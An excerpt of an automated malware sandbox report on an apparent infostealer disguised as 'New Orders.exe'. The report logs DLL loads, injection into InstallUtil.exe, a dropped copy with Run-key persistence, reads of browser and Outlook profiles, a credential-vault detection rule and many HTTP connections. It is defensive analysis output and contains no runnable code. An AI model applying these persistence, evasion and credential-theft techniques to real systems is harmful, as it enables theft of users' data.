                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeSection loaded: cryptbase.dll
                  Source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/8@6/100
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\YZbrmytJump to behavior
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:43004:120:WilError_03
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7672
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:42768:120:WilError_03
                  Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\80596a31-903a-45bb-877b-6289cfabc9aaJump to behavior
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exeReversingLabs: Detection: 52%
                  Source: unknownProcess created: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7672 -s 107896
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exe "C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exe"
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exe "C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exe"
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exeJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exeJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exeJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000007.00000002.2594076549.0000000006372000.00000004.00000020.00020000.00000000.sdmp, YZbrmyt.exe, 0000000C.00000000.1826981076.00000000006F2000.00000002.00000001.01000000.0000000A.sdmp, YZbrmyt.exe.7.dr
                  Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000007.00000002.2594076549.0000000006372000.00000004.00000020.00020000.00000000.sdmp, YZbrmyt.exe, 0000000C.00000000.1826981076.00000000006F2000.00000002.00000001.01000000.0000000A.sdmp, YZbrmyt.exe.7.dr
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exeStatic PE information: 0xC398581B [Tue Dec 26 19:12:27 2073 UTC]
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02E6ED78 push eax; retn 069Eh7_2_02E6EE11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02E60CB5 push edi; ret 7_2_02E60CC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run YZbrmytJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run YZbrmytJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exe:Zone.Identifier read attributes | deleteJump to behavior
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 49478
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 30951
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 9764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 31033
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 8800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 26315
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 9401
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 8197
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 31679
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 64120
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 5775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 37847
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 8181
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 9090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 49478
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 8090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 7777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 26353
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 9764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 17145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 8193
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9401 -> 49827
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 24834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 55198
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49828
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 18080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 26087
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 55109
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 10003
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 14282
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49884
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 24279
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 9091
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 50062
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49881
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 1431
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 8088
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 5430
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 7777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50182 -> 13477
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 5000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 49834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7777 -> 49886
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 7777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50256 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 59268
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 8800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 8800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 1337
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49971
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49914
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50207 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10003 -> 49999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50238 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 30000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50236 -> 7891
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50206 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50019
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50271 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50261 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50301 -> 9764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 12334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50396 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50300 -> 44195
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50387 -> 6001
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50393 -> 19599
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50403 -> 5432
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50317 -> 65000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 24834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50330 -> 9123
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50331 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9091 -> 50001
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 37847
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 49478
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 64120
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50320 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50426 -> 24543
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50296 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50381 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 7302
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50355 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50467 -> 53777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50439 -> 25491
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50369 -> 8193
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50438 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 84
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50443 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50207
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 26087
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1337 -> 50180
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50468 -> 3335
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 9990
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50373 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50414 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50353 -> 31247
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50383 -> 9090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50503 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50471 -> 27391
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7777 -> 50030
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50421 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 31908
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50473 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50576 -> 56225
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50544 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50519 -> 5123
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50271
                  Source: unknownNetwork traffic detected: HTTP traffic on port 30000 -> 50203
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 45876
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 26976
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 55198
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50540 -> 24397
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50554 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50261
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50206
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50509 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50575 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5432 -> 50403
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50566 -> 5529
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50507 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50489 -> 8880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 24543 -> 50426
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50492 -> 9090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50543 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 49806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 55109
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50286 -> 82
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50584 -> 18080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 54240
